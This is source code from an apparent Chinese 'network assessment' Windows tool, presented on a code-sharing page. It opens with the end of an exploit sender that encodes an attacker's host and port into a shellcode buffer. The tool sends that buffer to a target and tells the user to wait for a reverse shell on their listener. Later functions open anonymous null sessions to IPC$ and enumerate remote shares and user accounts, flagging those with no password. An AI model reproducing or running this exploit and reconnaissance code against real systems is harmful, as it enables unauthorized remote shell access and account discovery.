?? 網(wǎng)絡(luò)評(píng)估view.cpp
字號(hào):
}
if ((ht = gethostbyname(argv[1])) == 0){
#ifndef WIN32
herror(argv[1]);
#else
pView->AddString( "Unable to resolve host ");
#endif
return 0;
}
sin.sin_port = htons(atoi(argv[2]));
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(argv[3])) == 0){
#ifndef WIN32
herror(argv[3]);
#else
pView->AddString("Unable to resolve host ");
#endif
return 0;
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]=(char) ((a_host) & 0xff);
sploit[447]= (char)((a_host >> 8) & 0xff);
sploit[448]= (char)((a_host >> 16) & 0xff);
sploit[449]=(char) ((a_host >> 24) & 0xff);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
pView->AddString("socket");
return 0;
}
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
pView->AddString("connect");
return 0;
}
else
pView->AddString("Connected.");
if(send(s,sploit,strlen(sploit),0) == -1) {
pView->AddString("Error Sending Exploit.");
return(-1);
}
else
pView->AddString("sent... you may need to send a carriage on your listener if the shell doesn't appear.have fun!");
::Sleep (1);
closesocket(s);
return 1;
}
BOOL EstablishNullSession(LPCWSTR Server,BOOL bEstablish)
{
LPCWSTR szIpc = L"\\IPC$";
WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
DWORD cchServer;
NET_API_STATUS nas;
//
// do not allow NULL or empty server name
//
if(Server == NULL || *Server == L'\0') {
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}
cchServer = lstrlenW( Server );
if(Server[0] != L'\\' && Server[1] != L'\\') {
//
// prepend slashes and NULL terminate
//
RemoteResource[0] = L'\\';
RemoteResource[1] = L'\\';
RemoteResource[2] = L'\0';
}
else {
cchServer -= 2; // drop slashes from count
RemoteResource[0] = L'\0';
}
if(cchServer > CNLEN) {
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}
if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;
//
// disconnect or connect to the resource, based on bEstablish
//
if(bEstablish) {
USE_INFO_2 ui2;
ZeroMemory(&ui2, sizeof(ui2));
ui2.ui2_local = NULL;
ui2.ui2_remote = (LPTSTR) RemoteResource;
ui2.ui2_asg_type = USE_IPC;
ui2.ui2_password =(LPTSTR) L"";
ui2.ui2_username =(LPTSTR) L"";
ui2.ui2_domainname = (LPTSTR) L"";
HINSTANCE FLibHandle1=LoadLibrary("NETAPI32.DLL");
NetUseAdd_dll=(LPFNDLLFUNC15)GetProcAddress(FLibHandle1, "NetUseAdd");
if(NetUseAdd_dll!=NULL)
{
nas = NetUseAdd_dll(NULL, 2, (LPBYTE)&ui2, NULL);
FreeLibrary(FLibHandle1);
}
// nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
}
else {
//nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);
HINSTANCE FLibHandle2=LoadLibrary("NETAPI32.DLL");
NetUseDel_dll=(LPFNDLLFUNC16)GetProcAddress(FLibHandle2, "NetUseDel");
if(NetUseDel_dll!=NULL)
{
nas = NetUseDel_dll(NULL, (LPTSTR) RemoteResource, 0);
FreeLibrary(FLibHandle2);
}
}
if( nas == NERR_Success ) return TRUE; // indicate success
SetLastError( nas );
return FALSE;
}
int diskenum(LPWSTR computername,LPVOID lParam){
CMyView*pView=(CMyView*)lParam;
HWND hwnd=pView->GetSafeHwnd();
pView->AddString("列舉netbios共享(嘗試winnt/2000系統(tǒng))...要等待一段時(shí)間...");
::SendMessage(hwnd,WM_REDRAW,0,0);
UCHAR temp[300],temp1[300];
PSHARE_INFO_502 BufPtr,p;
NET_API_STATUS res;
DWORD i;
DWORD entriesread=0, resume_handle=0, totalentries=0;
pView->AddString("NetBIOS Share Results----------------");
::SendMessage(hwnd,WM_REDRAW,0,0);
if(computername == NULL)
pView->AddString("解析。。。。Shares: Local Path: Uses: Descriptor: ");
::SendMessage(hwnd,WM_REDRAW,0,0);
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetShareEnum_dll=(LPFNDLLFUNC4)GetProcAddress(FLibHandle, "NetShareEnum");
if (NetShareEnum_dll!=NULL)
{
res = NetShareEnum_dll((LPWSTR)computername,
502,
(LPBYTE *) &BufPtr,
0xFFFFFFFF,
&entriesread,
&totalentries,
&resume_handle);
FreeLibrary(FLibHandle);
}
if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA)
{
pView->AddString("Shares: Local Path: Uses: Descriptor:");
::SendMessage(hwnd,WM_REDRAW,0,0);
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetApiBufferFree_dll=(LPFNDLLFUNC5)GetProcAddress(FLibHandle, "NetApiBufferFree");
if (NetApiBufferFree_dll!=NULL)
{
NetApiBufferFree_dll(BufPtr);
FreeLibrary(FLibHandle);
}
}
do{
HINSTANCE FLibHandle1=LoadLibrary("NETAPI32.DLL");
NetShareEnum_dll=(LPFNDLLFUNC4)GetProcAddress(FLibHandle1, "NetShareEnum");
if (NetShareEnum_dll!=NULL)
{
res = NetShareEnum_dll((LPWSTR)computername,
502,
(LPBYTE *) &BufPtr,
0xFFFFFFFF,
&entriesread,
&totalentries,
&resume_handle);
FreeLibrary(FLibHandle1);
}
if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA){
p=BufPtr;
for(i=1;i<=entriesread;i++){
sprintf((LPTSTR)temp,"Shares:%S\\%S Local Path:%S Uses:%S Descriptor:%u",computername,p->shi502_netname,p->shi502_netname, p->shi502_path, p->shi502_current_uses);
pView->AddString(temp);
sprintf((LPTSTR)temp1,"Shares:%S\\%S Local Path:%S Uses:%S Descriptor:%u",computername,p->shi502_netname,p->shi502_netname, p->shi502_path, p->shi502_current_uses);
pView->m_stringShares.AddTail(temp1);
::SendMessage(hwnd,WM_REDRAW,0,0);
if (IsValidSecurityDescriptor(p->shi502_security_descriptor))
pView->AddString("p->shi502_security_descriptor=YES");
else
pView->AddString("p->shi502_security_descriptor=NO");
::SendMessage(hwnd,WM_REDRAW,0,0);
p++;
}
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetApiBufferFree_dll=(LPFNDLLFUNC5)GetProcAddress(FLibHandle, "NetApiBufferFree");
if (NetApiBufferFree_dll!=NULL)
{
NetApiBufferFree_dll(BufPtr);
FreeLibrary(FLibHandle);
}
return(0);
}
else {
sprintf((LPTSTR)temp,"Share Enumeration Error (%d)" ,GetLastError());//, ErrorHandle(pParam).begin());
pView->AddString(temp);
::SendMessage(hwnd,WM_REDRAW,0,0);
return(3); // Return 3 on error so we can run diskenum95()
}
}while (res==ERROR_MORE_DATA);
return(0);
}
int diskenum_95(LPWSTR computername,LPVOID lParam){
CMyView*pView=(CMyView*)lParam;
HWND hwnd=pView->GetSafeHwnd();
pView->AddString("列舉netbios共享(嘗試win95/98)...要等待一段時(shí)間...");
::SendMessage(hwnd,WM_REDRAW,0,0);
UCHAR temp[300],temp1[300];
PSHARE_INFO_1 BufPtr,p;
NET_API_STATUS res;
DWORD i = 0;
DWORD entriesread=0, resume_handle=0, totalentries=0;
if(computername == NULL)
pView->AddString("解析。。。。Shares: Type: Comment:");
::SendMessage(hwnd,WM_REDRAW,0,0);
do{
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetShareEnum_dll=(LPFNDLLFUNC4)GetProcAddress(FLibHandle, "NetShareEnum");
if (NetShareEnum_dll!=NULL)
{
res = NetShareEnum_dll((LPWSTR)computername,
1,
(LPBYTE *) &BufPtr,
0xFFFFFFFF,
&entriesread,
&totalentries,
&resume_handle);
FreeLibrary(FLibHandle);
}
if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA){
p = BufPtr;
for(i=0;i<entriesread;i++){
sprintf((LPTSTR)temp,"Shares:%S\\%S netname:%S Type:%u Comment:%S",computername, p->shi1_netname, p->shi1_netname, p->shi1_type, p->shi1_remark);
pView->AddString(temp);
sprintf((LPTSTR)temp1,"Shares:%S\\%S netname:%S Type:%u Comment:%S",computername, p->shi1_netname, p->shi1_netname, p->shi1_type, p->shi1_remark);
pView->m_stringShares.AddTail(temp1);
::SendMessage(hwnd,WM_REDRAW,0,0);
p++;
}
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetApiBufferFree_dll1=(LPFNDLLFUNC6)GetProcAddress(FLibHandle, "NetApiBufferFree");
if (NetApiBufferFree_dll1!=NULL)
{
NetApiBufferFree_dll1(BufPtr);
FreeLibrary(FLibHandle);
}
}
else{
sprintf((LPTSTR)temp,"Share Enumeration Error (%d)" ,GetLastError());//, ErrorHandle(pParam).begin());
pView->AddString(temp);
::SendMessage(hwnd,WM_REDRAW,0,0);
//printf("Attempting to obtain NetBIOS shares using lower security setting\n");
return(-1);
}
}while (res==ERROR_MORE_DATA);
return(0);
}
int queryuser(LPWSTR szServer,LPVOID lParam){
CMyView*pView=(CMyView*)lParam;
HWND hwnd=pView->GetSafeHwnd();
pView->AddString("列舉用戶(hù)名...要等待一段時(shí)間...");
::SendMessage(hwnd,WM_REDRAW,0,0);
UCHAR temp[300];
UCHAR temp1[256];
PNET_DISPLAY_USER pBuff, p;
DWORD res, dwRec, i = 0;
do{
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetQueryDisplayInformation_dll=(LPFNDLLFUNC3)GetProcAddress(FLibHandle, "NetQueryDisplayInformation");
if (NetQueryDisplayInformation_dll!=NULL)
{
res = NetQueryDisplayInformation_dll(szServer, 1, i, 10000, 10000*sizeof(NET_DISPLAY_USER), &dwRec, (PVOID *)&pBuff);
FreeLibrary(FLibHandle);
}
if((res==ERROR_SUCCESS) || (res==ERROR_MORE_DATA)){
p = pBuff;
pView->AddString("User Query Results------------------------------");
//(dlglocal->m_HistoryEdit).AppendString("Name: Comment: Full Name: User ID:");
::SendMessage(hwnd,WM_REDRAW,0,0);
for(;dwRec>0;dwRec--){
sprintf((LPTSTR)temp,"Name:%S Comment:%S Full Name:%S User ID:%u",
p->usri1_name,
p->usri1_comment,
p->usri1_full_name,
p->usri1_user_id);
sprintf((LPTSTR)temp1,"%S",p->usri1_name);
pView->m_stringUsers.AddTail(temp1);
pView->AddString(temp);
::SendMessage(hwnd,WM_REDRAW,0,0);
if (p->usri1_flags & UF_SCRIPT)
pView->AddString("The logon script executed. This value must be set for LAN Manager 2.0 or Windows NT.");
if (p->usri1_flags & UF_ACCOUNTDISABLE)
pView->AddString("The user's account is disabled.");
if (p->usri1_flags & UF_HOMEDIR_REQUIRED)
pView->AddString("The home directory is required. Windows NT ignores this value.");
if (p->usri1_flags & UF_PASSWD_NOTREQD)
pView->AddString(" No password is required");
if (p->usri1_flags & UF_PASSWD_CANT_CHANGE )
pView->AddString("The user cannot change the password.");
if (p->usri1_flags & UF_LOCKOUT)
pView->AddString("The Account is Locked");
if (p->usri1_flags & UF_DONT_EXPIRE_PASSWD)
pView->AddString("Password does not expire");
::SendMessage(hwnd,WM_REDRAW,0,0);
i = p->usri1_next_index; //if there is more then set the index
p++;
}
HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
NetApiBufferFree_dll2=(LPFNDLLFUNC7)GetProcAddress(FLibHandle, "NetApiBufferFree");
if (NetApiBufferFree_dll2!=NULL)
{
NetApiBufferFree_dll2(pBuff);
FreeLibrary(FLibHandle);
}
return(0);
}
else{
sprintf((LPTSTR)temp, "User Enumeration Error:(%u) " ,res);//, ErrorHandle(pParam).begin());
pView->AddString(temp);
::SendMessage(hwnd,WM_REDRAW,0,0);
return(-1);
}
}while (res==ERROR_MORE_DATA);
}
?? 快捷鍵說(shuō)明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號(hào)
Ctrl + =
減小字號(hào)
Ctrl + -